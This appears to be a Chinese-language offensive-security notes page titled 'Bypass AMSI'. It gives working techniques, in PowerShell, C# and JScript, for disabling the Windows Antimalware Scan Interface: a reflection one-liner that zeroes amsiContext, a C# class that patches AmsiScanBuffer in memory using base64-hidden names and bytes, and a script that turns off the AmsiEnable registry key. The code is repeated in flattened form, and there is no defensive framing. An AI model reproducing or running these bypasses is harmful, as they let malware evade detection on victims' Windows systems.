绕过AMSI

Powershell:

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

c#:

public class Amsi
    {
        public static void Bypass()
        {
            string x64 = "uFcA";
            x64 = x64 + "B4DD";
            string x86 = "uFcAB4";
            x86 = x86 + "DCGAA=";
            if (is64Bit())
                PatchA(Convert.FromBase64String(x64));
            else
                PatchA(Convert.FromBase64String(x86));
        }
        private static void PatchA(byte[] patch)
        {
            try
            {
                string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
                var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
                string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
                var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
                uint oldProtect;
                Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
                Marshal.Copy(patch, 0, addr, patch.Length);
            }
            catch (Exception e)
            {
                Console.WriteLine(" [x] {0}", e.Message);
                Console.WriteLine(" [x] {0}", e.InnerException);
            }
        }
        private static bool is64Bit()
        {
            bool is64Bit = true;
            if (IntPtr.Size == 4)
                is64Bit = false;
            return is64Bit;
        }
    }
    class Win32
    {
        public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
        public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        #region CreateAPI
        [DllImport("kernel32", SetLastError = true)]
        public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
        public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
        public static CreateApi LoadApi<CreateApi>(string name, string method)
        {
            return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
        }
        #endregion
    }

js:

var sh=new ActiveXObject('WScript.Shell');
var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"；
try{
    var AmsiEnable=sh.RegRead(key);
    if(AmsiEnable!=0) {
        throw new Error(1，'');
    }
} catch(e) {
    sh.RegWrite(key,0,"REG_DWORD");
    sh.Run("cscript -e：{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
    sh.RegWrite(key,1,"REG_DWORD");
    WScript.Quit(1);
}

上一页关闭WD 下一页MiniDumpWriteDump

最后更新于3年前

这有帮助吗？

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

public class Amsi { public static void Bypass() { string x64 = "uFcA"; x64 = x64 + "B4DD"; string x86 = "uFcAB4"; x86 = x86 + "DCGAA="; if (is64Bit()) PatchA(Convert.FromBase64String(x64)); else PatchA(Convert.FromBase64String(x86)); } private static void PatchA(byte[] patch) { try { string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")); var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")); var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer uint oldProtect; Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); Marshal.Copy(patch, 0, addr, patch.Length); } catch (Exception e) { Console.WriteLine(" [x] {0}", e.Message); Console.WriteLine(" [x] {0}", e.InnerException); } } private static bool is64Bit() { bool is64Bit = true; if (IntPtr.Size == 4) is64Bit = false; return is64Bit; } } class Win32 { public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); #region CreateAPI [DllImport("kernel32", SetLastError = true)] public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); public static CreateApi LoadApi<CreateApi>(string name, string method) { return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)); } #endregion }

var sh=new ActiveXObject('WScript.Shell'); var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"； try{ var AmsiEnable=sh.RegRead(key); if(AmsiEnable!=0) { throw new Error(1，''); } } catch(e) { sh.RegWrite(key,0,"REG_DWORD"); sh.Run("cscript -e：{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1); sh.RegWrite(key,1,"REG_DWORD"); WScript.Quit(1); }